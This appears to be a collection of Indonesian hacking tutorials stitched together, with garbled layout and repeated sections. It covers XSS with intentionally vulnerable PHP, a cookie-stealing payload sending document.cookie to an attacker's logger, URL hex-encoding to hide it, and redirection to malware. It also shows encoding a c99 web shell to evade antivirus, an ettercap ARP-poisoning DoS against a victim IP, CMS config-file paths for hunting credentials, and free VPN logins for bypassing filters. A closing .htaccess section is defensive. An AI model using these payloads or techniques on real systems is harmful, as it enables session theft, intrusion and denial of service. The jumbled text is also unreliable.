tidak melakukan filtrasi terhadap inputan yang diberikan oleh user dan dapat disimpan secara
permanen dalam sebuah website.
Umumnya hal ini terjadi pada aplikasi-aplikasi yang mengizinkan user menyimpan data secara bebas
dalam sebuah website. Aplikasi-aplikasi tersebut diantaranya adalah buku tamu (guestbook), forum
dan aplikasi sejenis lainnya.
Akibat yang ditimbulkan
Umumnya celah keamanan ini akan lebih banyak menimpa client ketimbang server. Misalnya
seperti Cookie Stealing, Session Hijacking, Phising dan lain sebagainya.
Proof of Concept (PoC)
Dibawah ini dapat anda temukan tulisan yang menunjukkan Proof of Concept atau pembuktian dari
sederetan teori yang telah dijelaskan diatas, Pastikan Apache, MySQL dan PHP (AMP) telah terinstall
didalam PC anda sebelum mencoba PoC dibawah ini.
Non-Persistent and DOM XSS Attack
Seperti yang telah dipaparkan sebelumnya serangan DOM XSS dan Non-persistent XSS hampir
sama pola eksploitasinya. Untuk membantu dalam memahami pola serangan tersebut, dibawah ini
sudah di siapkan sebuah contoh code html/php sederhananya.
buat
File: index.html
<html>File: cari.php
<head>
<title>Search Engine with XSS Vulnerability</title>
</head>
<body>
<form method=”GET” action=”cari.php”>
<input type=”text” size=”25” name=“key”>
<input type=”submit” value=”Cari..”>
</form>
</body>
</html>
<?phpPenjelasan:
/* PHP Non-Persistent and DOM XSS Attack Code
** Programmer: Marion Renaldo Rotinsulu
** Date: 3rd May 2011
** Filename: cari.php
** Version: 1.0
** Description: File ini merupakan contoh sederhana dari aplikasi searching
dalam sebuah web.
*/
session_start();
$_SESSION[‘desc’] = “ujicoba dom dan non-persistent xss”;
if(isset($_GET[“key”])){
echo “<pre> Anda sedang mencari dengan kata kunci
”.$_GET[“key”].”…</pre>”;
}
?>
Anda bayangkan sekarang anda sedang menggunakan search engine layaknya google. Dihalaman
utama google hanya ada sebuah halaman dengan 1 form untuk search dan 1 lagi button submitnya.
Didalam scenario kali ini kita namakan file tersebut adalah index.html. Untuk dapat memproses apa
yang anda inginkan tentunya butuh file yang bertindak sebagai processor. File tersebut dalam
scenario kali ini kita namakan cari.php.
Pada metode passing parameter dari box search di halaman index.html kita memilih untuk
menggunakan metode GET pada http, sehingga parameter yang akan kita kirimkan pada file cari.php
akan terlihat pada kolom url.
Sebagai contoh kita akan mencari “Security” maka
setelah anda tekan tombol Cari di halaman index.html,
anda akan diantarkan pada halaman cari.php dan di
browser akan ada tulisan sebagai berikut: Anda
Sedang mencari dengan kata kunci Security…
Selanjutnya mari kita perhatikan kolom url pada
browser, maka aka nada tulisan sebagai berikut:
http://localhost/cari.php?key=Security.
Jika kita lihat pada source code cari.php, programmer tidak melakukan filtering terhadap inputan yang
diberikan oleh pengguna. Sehingga, apapun yang kalian cantumkan akan dieksekusi oleh php script.
Sekarang, coba kalian ganti kata Security pada url dengan <script>alert(“ih Wow!)</script>. Yang
akan terjadi adalah box alert akan muncul pada browser dengan tulisan “ih Wow!”.
Ketika halaman cari.php dapat melakukan eksekusi terhadap inputan javascript diatas, artinya
halaman website tersebut vulnerable terhadap serangan yang dinamakan XSS. Namun, bagaimana
untuk menggunakan vulnerable XSS ini untuk melakukan kejahatan? Jawaban: dengan
memanfaatkan kode javascript. Berikut beberapa contoh pemanfaat XSS yang populer (Cookie
Stealing, URL Redirection/Phising).
Cookie Stealing
Cookie stealing digunakan untuk mencuri cookie yang ada pada komputer client, yang dapat
dimanfaatkan untuk kejahatan session hijacking dan akhirnya berujung pada login bypass. Untuk
melakukan cookie stealing bisa dilakukan dengan cara sebagai berikut:
Skenario:
Di website http://localhost/xss/ sudah diketemukan bahwa website tersebut memiliki vulnerability xss.
Website ini banyak diakses oleh user diberbagai dunia sehingga, seorang attacker akan melakukan
aksinya guna mencuri cookie yang ada pada computer user.
Langkah awal sang attacker membuat dua file yaitu payload.js dan cookie.php. payload.js adalah file
yang akan di embed kedalam URI website http://localhost/xss/ sedangkan file cookie.php akan
disimpan di dalam server yang dimiliki oleh sang attacker. Dibawah ini dapat ditemukan script yang
dibuat oleh sang attacker untuk mencuri cookie pada computer user.
payload.js
// JavaScript Documentcookie.php
document.location="http://localhost/cookie/cookie.php?c="+document.cookie
<?phpPenjelasan baris per baris dari code yang saya tuliskan diatas tidak akan saya jelaskan didalam
/*Cookie Stealer*/
$f=fopen('cookie.txt','a');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
fwrite($f, "IP Address : ".$_SERVER['REMOTE_ADDR']."\n".
"Cookie : ".$_GET['c']."\n".
"Date/Time : ".$date."\n".
"Referer : ".$referer."\n".
"User Agent : ".$_SERVER['HTTP_USER_AGENT']."\n\n\n");
fclose($f);
?>
tulisan ini, karena untuk menjelaskannya sendiri membutuhkan waktu yang lumayan lama. Untuk
dapat melakukan pencurian cookie, kita akan melakukan embedding file javascript kedalam URI
sehingga menjadi seperti berikut :
http://localhost/xss/cari.php?key=<script src="http://localhost/cookie/payload.js"></script>
Namun jika URI seperti diatas akan diberikan kepada user, tentunya user akan menaruh kecurigaan.
Sehingga perlu dilakukan encode kedalam bentuk heksadesimal. Untuk melakukan encode ke dalam
hexadecimal, saya menggunakan tools yang telah ada di http://ha.ckers.org/xss.html. URI diatas akan
menjadi seperti berikut ini:
http://localhost/xss/cari.php?key=%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74
%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%63%6F%6F%6B%69%65%2F
%70%61%79%6C%6F%61%64%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
Sebelum anda melakukan serangan pastikan dua hal dibawah ini:
1. Folder tempat anda menyimpan file cookie nanti dapat ditulis oleh user apache. Pada contoh kali
ini saya meletakkan file cookie didalam folder yang sama dengan script phpnya.
2. Jika webserver anda linux, pastikan user apache diberikan privileges/izin untuk menulis difolder
tersebut. Amannnya di change modenya menjadi Read Write Execute oleh semua user, namun
jangan diletakkan difolder yang dapat diakses melalui website.
Setelah url berhasil di encode dan dilakukan eksekusi oleh user pada browsernya, maka cookie yang
ada di client akan disimpan pada file cookie.txt pada server attacker. Adapun dokumen cookie yang
tersimpan pada server isinya ditunjukkan pada gambar dibawah ini:
URL Redirection
Teknik yang digunakan dalam url redirection hampir sama dengan teknik cookie stealing. Tujuan dari
attacker menggunakan url redirection adalah menginginkan user membuka halaman palsu untuk login
biasa dikenal dengan istilah phising atau menginginkan user mendownload sesuatu ke dalam
komputernya seperti virus, worm, dan sebagainya.
Apa yang harus dimodifikasi dari yang telah kita buat dalam payload.js? yang kita akan modifikasi
adalah file yang akan kita berikan ketika user membuka url yang kita berikan. Untuk lebih
menggambarkan modifikasi tersebut, dapat diperhatikan contoh dibawah ini:
Attacker menginginkan user membuka url dan mendownload wormtail.exe yang merupakan virus
ganas kedalam komputernya. Maka modifikasi yang dilakukan oleh sang attacker dalam file
payload.js adalah
document.location= “http://www.example.com/wormtail.exe”
Persistent XSS Attack
Serangan jenis ini bersifat permanen karena attacker dapat menyimpan codenya kedalam database
website. Sangat sering dijumpai pada website yang ada guestbook ataupun shout box yang dibuat
tanpa memfilter inputan yang diberikan.
Untuk lebih menjelaskan tentang serangan jenis ini, kita akan membuat sebuah aplikasi guestbook
sederhana. Aplikasi ini kemudian diexploit oleh attacker dengan menggunakan teknik persistent XSS
attack.
Untuk membuat aplikasi guestbook ini, kita akan membuat 3 file utama yaitu form
guestbook(guestbook.html), user interface untuk melakukan viewing guestbook(view_guestbook.php),
dan file yang berfungsi untuk menangani proses penyimpanan ke dalam database(guestbook.php).
guestbook.html
<html>view_guestbook.php
<head>
<title>Buku Tamu</title>
</head>
<body>
<form method="post" action="guestbook.php">
<table border="0" align="center" cellpadding="0" cellspacing="0"
width="300px">
<tr>
<td>Nama</td>
<td>:</td>
<td><input type="text" name="nama" size="15"></td>
</tr>
<tr>
<td valign="top">Pesan</td>
<td valign="top">:</td>
<td valign="top"><textarea name="pesan" cols="25"
rows="12"></textarea></td>
</tr>
<tr>
<td colspan="3" align="center"><input type="submit"
value="Simpan!"></td>
</tr>
</table>
</form>
</body>
</html>
/* PHP View Guestbook Codeguestbook.php
** Programmer: Marion Renaldo Rotinsulu
** Date: 5th May 2011
** Filename: view_guestbook.php
** Version: 1.0
** Description: File ini merupakan contoh sederhana dari aplikasi view
guestbook dalam sebuah web.
*/
<html>
<head>
<title>ISI BUKU TAMU</title>
</head>
<body>
<table border="1" cellpadding="5" cellspacing="3" style="bordercollapse:
collapse">
<tr><td>Ke</td><td>Nama</td><td>Pesan</td>
<?php
mysql_connect("localhost","root","marionaja");
mysql_select_db("test");
$query= mysql_query("SELECT * FROM bukutamu");
while(($result = mysql_fetch_object($query))){
echo "<tr><td>".$result->id."</td><td>".$result-
>nama."</td><td>".$result->pesan."</td></tr>";
}
?>
</table>
</body>
</html>
/* PHP Guestbook CodePada script diatas, anda dimungkinkan untuk melakukan submit pada aplikasi guestbook seperti
** Programmer: Marion Renaldo Rotinsulu
** Date: 5th May 2011
** Filename: view_guestbook.php
** Version: 1.0
** Description: File ini akan menangani “penyimpanan” data kedalam website.
*/
<?php
$nama = $_POST["nama"];
$pesan = $_POST["pesan"];
mysql_connect("localhost","root","marionaja");
mysql_select_db("test");
mysql_query("INSERT INTO `bukutamu` VALUES
('','".$nama."','".$pesan."')");
?>
<script>alert(‘test’);</script> dan itu akan disimpan permanent di dalam database.
Akibatnya, setiap kali anda akan membuka halaman view_guestbook kotak alert akan selalu keluar
Akibat yang lebih parah dari adanya kerentanan ini adalah cookie stealing. Tekniknya sama seperti
diatas hanya saja kita akan memasukkan payload yang telah kita buat pada non-persistent xss untuk
disimpan pada buku tamu yang kita buat saat ini.
Pencegahan
Pencegahan utama dari vulnerability XSS ini adalah melakukan filter terhadap inputan yang diberikan
user. Tanpa adanya filter input pada aplikasi, vulnerability ini tetap berbahaya.
Pada aplikasi berbasis php gampangnya kita menggunakan fungsi strip_tags() untuk melakukan
filtering terhadap simbol2 inputan user yang dapat menimbulkan xss. Pada script guestbook.php
diatas inputan nama/pesan diubah menjadi berikut
$nama = strip_tags($_GET[“nama”]);Ada juga cara lain yang dapat digunakan untuk melakukan filter input. Cara ini agak rumit karena kita
$pesan = strip_tags($_GET[“pesan”]);
harus belajar cara penulisannya. Cara yang saya maksudkan adalah Regular Expression (RegEx
<baca:regex>). Pada tulisan kali ini saya tidak akan membahas tentang regex, karena membahas
regex sama halnya dengan menuliskan artikel yang baru.
Kesimpulan
Dari apa yang ada pada tulisan ini kesimpulan yang dapat kita ambil adalah Cross Site Scripting tidak
membahayakan server, namun yang menjadi ancaman utama dari serangan ini adalah Client/User.
"to the point" aja :
disini saya asumsikan bahwa shell/backdoor yang kita gunakan nanti adalah berbasis PHP (script php)
contohnya: c99 (saya gunakan ini)
c99.php bisa di download c99shell collection
tentu saja script tersebut jika di-scan dengan antivirus bakalan dikenali sebagai trojan/backdoor/phpshell dan semacamnya.
tentunya umur dari shell yang akan kita pasang nantinya gak akan bertahan lama jika server menggunakan
antivirus
saya scan di virustotal.com
dan hasilnya:
lalu bagaimana supaya gak terdeteksi??
Hehehe..
script shell yang saya dunlut tadi (c99.txt) tentunya masih telanjang yang sangat gampang untuk di deteksi oleh AV..
jadi untuk mengecoh AV saya akan mencoba untuk meng-encode script shell tersebut (mungkin bisa dibilang enkripsi kalee ya)
untuk cara cepatnya saya gunakan PHP Encoder online
salah satunya: http://www.phpshadow.com/online-encoder.php
tinggal kita masukkan disana source dari script shell yang kita gunakan kemudian klik tombol encode :blink:
copas deh tuw hasil encode nya n simpen extensi .php/.txt/.jpg ato apalah yang biasa anda gunakan...
kemudian coba scan lagi dengan AV, saya coba lagi di virustotal.com
dan hasilnya:
bisa dibilang 99% AV terkecoh dan tidak mengenali shell/BD yang sudah di encode tadi :P
semoga bermanfaat....
disini saya asumsikan bahwa shell/backdoor yang kita gunakan nanti adalah berbasis PHP (script php)
contohnya: c99 (saya gunakan ini)
c99.php bisa di download c99shell collection
tentu saja script tersebut jika di-scan dengan antivirus bakalan dikenali sebagai trojan/backdoor/phpshell dan semacamnya.
tentunya umur dari shell yang akan kita pasang nantinya gak akan bertahan lama jika server menggunakan
antivirus
saya scan di virustotal.com
dan hasilnya:
lalu bagaimana supaya gak terdeteksi??
Hehehe..
script shell yang saya dunlut tadi (c99.txt) tentunya masih telanjang yang sangat gampang untuk di deteksi oleh AV..
jadi untuk mengecoh AV saya akan mencoba untuk meng-encode script shell tersebut (mungkin bisa dibilang enkripsi kalee ya)
untuk cara cepatnya saya gunakan PHP Encoder online
salah satunya: http://www.phpshadow.com/online-encoder.php
tinggal kita masukkan disana source dari script shell yang kita gunakan kemudian klik tombol encode :blink:
copas deh tuw hasil encode nya n simpen extensi .php/.txt/.jpg ato apalah yang biasa anda gunakan...
kemudian coba scan lagi dengan AV, saya coba lagi di virustotal.com
dan hasilnya:
bisa dibilang 99% AV terkecoh dan tidak mengenali shell/BD yang sudah di encode tadi :P
semoga bermanfaat....
VPN adalah singkatan dari Virtual Private Network, yaitu sebuah cara aman untuk mengakses local area network yang berada diluar jangkauan, dengan menggunakan internet atau jaringan umum lainnya untuk melakukan transmisi paket data secara pribadi, dan terenkripsi. Sedangkan PPTP adalah singkatan dari Point-to-Point Tunneling Protocol, dan merupakan sebuah metode dalam implementasi penggunaan VPN. Pembahasan PPTP memang sedikit lebih teknis, dan kita tidak membahasnya disini.
VPN biasanya digunakan untuk menghubungkan kantor-kantor yang tersebar dibeberapa tempat dengan menggunakan akses internet. Namun, VPN juga dapat digunakan untuk keperluan lain, seperti anonimity (menyembunyikan identitas) atau mem-bypass firewall (termasuk mem-bypass content filtering).
VPN komersial, biasanya menggunakan aplikasi khusus untuk melakukan koneksi VPN, dan menurut saya penggunaannya kurang simpel, karena aplikasi tersebut harus di instal kedalam komputer. Oleh karena itu, saya lebih memilih VPN dengan dukungan PPTP, karena kita dapat menghubungkan komputer langsung ke jaringan VPN tanpa menggunakan aplikasi tambahan.
Ada beberapa situs yang menyediakan VPN gratis dengan dukungan PPTP, antara lain :
atau pengen yang free dan kecepatanya wush wush bisa iat user n pass diDalam tutorial VPN dengan PPTP ini, saya menggunakan komputer berbasis Windows 7. Sehingga pengaturannya mungkin akan sedikit berbeda jika anda menggunakan sistem operasi lainnya.
dan saya mengambi data free dari http://www.vpnbook.com/#pricing
Langkah-langkah melakukan koneksi VPN dengan PPTP?
Terlebih dahulu kunjungi salah satu website diatas, kemudian catat VPN server, username dan password-nya. Dalam contoh berikut kita akan menggunakan VPN dvildancedan saya mengambi data free dari http://www.vpnbook.com/#pricing
Server #1 (Romania)
I.P: euro1.vpnbook.com
Username: pptp
Password: 9jHbfKiN
Server #2 (Romania)
I.P: euro2.vpnbook.com
Username: pptp
Password: 9jHbfKiN
Langkah-langkah melakukan koneksi VPN dengan PPTP?
Selanjutnya, bukalah Control Panel dari Start Menu, kemudian pilih ”View network status and tasks” dibawah kategori “Network and Internet”.
Kemudian, klik pada pilihan “Setup a new connection or network“
Pilih pada “Connect to a workplace“, kemudian pilih Next.
Langkah selanjutnya, pilih “No, create a new connection“, kemudian Next.
Selanjutnya, pilih “Use my internet connection (VPN)“
Pada bagian Internet address isikan dengan VPN server yang dicatat sebelumnya, dan untuk Destination name isikan terseraqh anda , dan tandai pada “Don’t connect now”.
Kemudian, pada bagian username isikan “ pptp”, untuk password biarkan kosong (karena password akan berubah secara berkala)atau kalau password tidak pernah berubah masukkan saja tidak apa apa 9jHbfKiN , kemudian pilih “Create”.
Terakhir pilih “Close“.
Untuk melakukan proses koneksi VPN, pastikan terlebih dahulu koneksi internet anda sudah aktif. Klik pada status koneksi di system tray (pojok kanan bawah taskbar), pilih VPN xbuster404, kemudian klik “Connect“.
Isikan password yang ditampilkan pada web superfreevpn ke dalam kolom password, kemudian klik “Connect” (biarkan domain kosong).
Proses koneksi akan berlangsung, dan tunggu sampai VPN terhubung. Jika VPN telah terhubung, maka akan terlihat 2 koneksi yang connected pada status koneksi di Windows
Silakan browsing dengan sepuasnya! :)
Dalam kondisi terhubung VPN, maka koneksi anda akan terenkripsi dan dapat melewati firewall atau content filtering dengan aman.
Fitur dari VPN ini :
PPTP and OpenVPN
100% Anonymous
No Logs ( Doesn't Not Log Any Activity )
100% Free !
No Bandwidth Limits
Strong Encryption
No Restrictions
Smart CDN Fallback
Maximum Speed
Works on all Mobile Devices and Operating System
tutor kali ini menggunakan backtrack os
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut
[01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses
[02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04]. Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut Ok Saya rasa Sudah jelas...ok
pertama kita cek dulu korbannya yang akan kita serang
buka terminal ketikkan perintah
arp-a
untuk melihat mangsa
disini korban saya IP 192.168.1.15
langsung saja
1. Buka Gedit (atau file editor apapun) kemudian tulis perintah di bawah ini
ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft
2. Convert file dos.eft menjadi dos.ef
3. Lakukan serangan
Jika target/korban mengakses internet maka rto alias not respon
Maka ip tersebut tidak bisa di gunakan lagi.Dan ini adalah hasil dari kelakuan kalian
sekian tutor dari saya
terima kasih ................
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut
[01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses
[02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04]. Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut Ok Saya rasa Sudah jelas...ok
pertama kita cek dulu korbannya yang akan kita serang
buka terminal ketikkan perintah
arp-a
untuk melihat mangsa
disini korban saya IP 192.168.1.15
langsung saja
gedit
1. Buka Gedit (atau file editor apapun) kemudian tulis perintah di bawah ini
if(ip.src == 'IP_TARGET' || ip.dst == 'IP_TARGET') {
drop();
kill();
msg("DDOS TrojanzBoy !!\n");
}
ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft
2. Convert file dos.eft menjadi dos.ef
etterfilter dos.eft -o dos.ef
3. Lakukan serangan
ettercap -T -q -F /root/dos.ef -M ARP /ip_targetmu/ // -i kartu_wireles/lanmu
Jika target/korban mengakses internet maka rto alias not respon
Maka ip tersebut tidak bisa di gunakan lagi.Dan ini adalah hasil dari kelakuan kalian
sekian tutor dari saya
terima kasih ................
Tapi disini kita akan membahas letak config tersebut pada tiap2 cms
berikut ini beberapa config cms beserta letaknya (default) :
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
semoga bermanfaat
File .htaccess adalah file teks ASCII sederhana yang terletak di direktori www atau di sebuah sub direktori folder www. Anda bisa membuat atau mengedit file ini di Text Editor (Notepad) dan kemudian meng-uploadnya ke direktori yang ingin anda ubah setting-nya. Pastikan bahwa file tersebut diupload dalam format ASCII bukan BINARY, dan pastikan file permission untuk file tersebut telah diset menjadi 644 (rw-r-r–). Hal tersebut memungkinkan server untuk mengakses file tapi mencegah user untuk mengakses file tersebut dari browser mereka.
ntu sedikit penjelasan tentang .htaccess dan pada trit cupu ane kali ini ane ga akan banyak menjelaskan tentang apa dan bagaimana itu file .htaccess, tp beberapa kegunaan file ini yang akan bermanfaat
untuk Security. Okeh langsung cruutz aja yak..
1. Mencegah Akses Ke .htaccess
Tambahkan baris berikut untuk menambah keamanan dari file .htaccess sehingga apabila ada usaha untuk mengakses file tersebut akan muncul pesan kesalahan 403. Tentu saja tidak lupa memberi-kan file permissionnya menjadi 644.
2. Mencegah Akses Ke File Tertentu
Untuk membatasi akses ke file tertentu kita dapat menggunakan perintah berikut.Ganti nama rahasia.txt menjadi sesuai dengan kebutuhan anda.Nantinya file tersebut akan disembunyikan dan apa-bila terdapat usaha untuk mengakses file tersebut akan terjadi error 403.
3. Mencegah Akses Ke Banyak File
Kita bisa mengganti beberapa extension dibawah sesuai dengan yang kita butuhkan.
Jika mengijinkan user untuk melakukan browsing pada “direktori yang telah kita tentukan” cukup menambahkan perintah seperti dibawah ini.(Cukup tempatkan file .htaccess pada folder yang diinginkan)
Secara default apabila kita membuat beberapa file dan salah satunya terdapat index file, maka file tersebutlah yang akan dijalankan terlebih dahulu. Dengan menggunakan .htaccess kita dapat merubah-nya menjadi nama file yang kita inginkan.
Ini sangat berguna untuk menambahkan keamanan pada aplikasi PHP yang anda buat. anda bisa mengganti extension php pada aplikasi anda dengan extension yang telah anda daftarkan, Mungkin “LOL”, “hacking”, dll. Nah dengan kode berikut, file tersebut akan tetap dibaca sebagai file PHP. Sedikit catatan, biasanya saya mencari file httpd.conf dan menambahkan extensionnya disitu, akan tetapi inilah kelebihan .htaccess. Kita tidak perlu merubah settingan asli pada Apache.
7.1. Bisa Menambahkan Domain
Hotlinking merupakan pencurian bandwidth melalui penggunaan sebuah image yang akan dipasang pada suatu halaman pada website lain, sehingga bandwidth dari website asal akan tersedot bila image yang dipasang pada website lain itu dibuka.Atau secara simple bisa diterjemahkan, ada orang lain yang mengkopi link image dari website kita dan menempatkannya pada website miliknya.Memang tidak terlalu banyak memakan bandwith akan tetapi hal ini cukup mengganggu dan mungkin kita bisa memberi sedikit pelajaran kepada si Pelaku :D. Kita akan melakukan beberapa praktek ringan.
a. Ketik kode berikut dan simpan dengan nama gambar.php
c. Upload kedua file tersebut ke server hosting ente.
d. Buka browser dan ketik URL sebagai berikut
http://websiteente.com/gambar.php?pic=terserah.jpg
Bila hanya seperti ini orang lain bisa saja melakukan Copy Image URL untuk menampilkannya di website miliknya dg kode bgini:
http://websiteente.com/terserah.jpg
Nah untuk mencegah hal itu terjadi maka kita harus menyiapkan file .htaccess yang berisi baris-baris seperti ini:
9. Memberikan Password Pada File
9.2. Memberikan Password Pada Direktori Dimana .htaccess Berada
Ini adalah salah satu metode sederhana yang bisa kita gunakan untuk mencegah serangan DOS. Disini kita membatasi ukuran upload sebesar 10240000 byte yang setara dengan 10 mb.
moga bermanfaat yah
ntu sedikit penjelasan tentang .htaccess dan pada trit cupu ane kali ini ane ga akan banyak menjelaskan tentang apa dan bagaimana itu file .htaccess, tp beberapa kegunaan file ini yang akan bermanfaat
untuk Security. Okeh langsung cruutz aja yak..
1. Mencegah Akses Ke .htaccess
Tambahkan baris berikut untuk menambah keamanan dari file .htaccess sehingga apabila ada usaha untuk mengakses file tersebut akan muncul pesan kesalahan 403. Tentu saja tidak lupa memberi-kan file permissionnya menjadi 644.
<Files .htaccess>order allow,denydeny from all</Files>
2. Mencegah Akses Ke File Tertentu
Untuk membatasi akses ke file tertentu kita dapat menggunakan perintah berikut.Ganti nama rahasia.txt menjadi sesuai dengan kebutuhan anda.Nantinya file tersebut akan disembunyikan dan apa-bila terdapat usaha untuk mengakses file tersebut akan terjadi error 403.
<files rahasia.txt>order allow,denydeny from all</files>
3. Mencegah Akses Ke Banyak File
Kita bisa mengganti beberapa extension dibawah sesuai dengan yang kita butuhkan.
4. Mencegah User Melakukan Browsing Pada Setiap Direktori Server Kita<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">Order Allow,DenyDeny from all</FilesMatch>
Options All -Indexes 4.1. Mengijinkan User Melakukan BrowsingJika mengijinkan user untuk melakukan browsing pada “direktori yang telah kita tentukan” cukup menambahkan perintah seperti dibawah ini.(Cukup tempatkan file .htaccess pada folder yang diinginkan)
Options All +Indexes 4.2. Mencegah User Melakukan Browsing Tanpa Pesan Error 403IndexIgnore * 4.3. Mencegah User Melakukan Browsing Dengan Membatasi Extension File.IndexIgnore *.wmv *.mp4 *.avi *.etc 5. Mengubah Index FileSecara default apabila kita membuat beberapa file dan salah satunya terdapat index file, maka file tersebutlah yang akan dijalankan terlebih dahulu. Dengan menggunakan .htaccess kita dapat merubah-nya menjadi nama file yang kita inginkan.
DirectoryIndex penggantiindex.php 6. Menyamarkan Extension PHPIni sangat berguna untuk menambahkan keamanan pada aplikasi PHP yang anda buat. anda bisa mengganti extension php pada aplikasi anda dengan extension yang telah anda daftarkan, Mungkin “LOL”, “hacking”, dll. Nah dengan kode berikut, file tersebut akan tetap dibaca sebagai file PHP. Sedikit catatan, biasanya saya mencari file httpd.conf dan menambahkan extensionnya disitu, akan tetapi inilah kelebihan .htaccess. Kita tidak perlu merubah settingan asli pada Apache.
AddType application/x-httpd-php .hacking 7. Membatasi Akses Ke LAN (Local Area Network)<Limit GET POST PUT>order deny,allowdeny from allallow from 192.168.1.5</Limit>
7.1. Bisa Menambahkan Domain
8. Mencegah Hotlinking<Limit GET POST PUT>order allow,denyallow from alldeny from 192.168.1.5deny from .*domain\.com.*</Limit>
Hotlinking merupakan pencurian bandwidth melalui penggunaan sebuah image yang akan dipasang pada suatu halaman pada website lain, sehingga bandwidth dari website asal akan tersedot bila image yang dipasang pada website lain itu dibuka.Atau secara simple bisa diterjemahkan, ada orang lain yang mengkopi link image dari website kita dan menempatkannya pada website miliknya.Memang tidak terlalu banyak memakan bandwith akan tetapi hal ini cukup mengganggu dan mungkin kita bisa memberi sedikit pelajaran kepada si Pelaku :D. Kita akan melakukan beberapa praktek ringan.
a. Ketik kode berikut dan simpan dengan nama gambar.php
b. Siapkan gambar dengan nama terserah.jpgPHP Code:<?php$pic = strip_tags( $_GET['pic'] );if ( ! $pic ) {die("Gambar Tidak Ditemukan");}?><html><head><title><?php echo($pic); ?></title></head><body><p><img src="/<?php echo($pic); ?>" alt="Test Hotlinking"></p></body></html>
c. Upload kedua file tersebut ke server hosting ente.
d. Buka browser dan ketik URL sebagai berikut
http://websiteente.com/gambar.php?pic=terserah.jpg
Bila hanya seperti ini orang lain bisa saja melakukan Copy Image URL untuk menampilkannya di website miliknya dg kode bgini:
http://websiteente.com/terserah.jpg
Nah untuk mencegah hal itu terjadi maka kita harus menyiapkan file .htaccess yang berisi baris-baris seperti ini:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} .*jpg$|.*gif$|.*png$ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !websitekamu\.com [NC]
RewriteCond %{HTTP_REFERER} !websiteteman\.com [NC]
RewriteCond %{HTTP_REFERER} !google\. [NC]
RewriteCond %{HTTP_REFERER} !search\?q=cache [NC]
RewriteRule (.*) /gambar.php?pic=$1 Maka ketika seseorang melakukannya lagi maka dia tidak akan mendapatkan hasil apa-apa.9. Memberikan Password Pada File
9.1. Memberikan Password Pada Banyak File<Files rahasia.php>AuthType BasicAuthName "Prompt"AuthUserFile /home/path/.htpasswdRequire valid-user</Files>
<FilesMatch "^(execute|index|secure|insanity|biscuit)*$">
AuthType basic
AuthName "Development"
AuthUserFile /home/path/.htpasswd
Require valid-user
</FilesMatch>9.2. Memberikan Password Pada Direktori Dimana .htaccess Berada
resides
AuthType basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user10. Otomatis Memberikan CHMOD Kepada Setiap File11. Melindungi Dari Serangan DOS ( Denial Of Service ) Dengan Membatasi Upload Filechmod .htpasswd files 640chmod .htaccess files 644chmod php files 600
Ini adalah salah satu metode sederhana yang bisa kita gunakan untuk mencegah serangan DOS. Disini kita membatasi ukuran upload sebesar 10240000 byte yang setara dengan 10 mb.
LimitRequestBody 10240000 12. Mengamankan Direktori Dari Pengeksekusian Script Atau Filehmmh... segitu dulu deh,,AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgiOptions -ExecCGI

















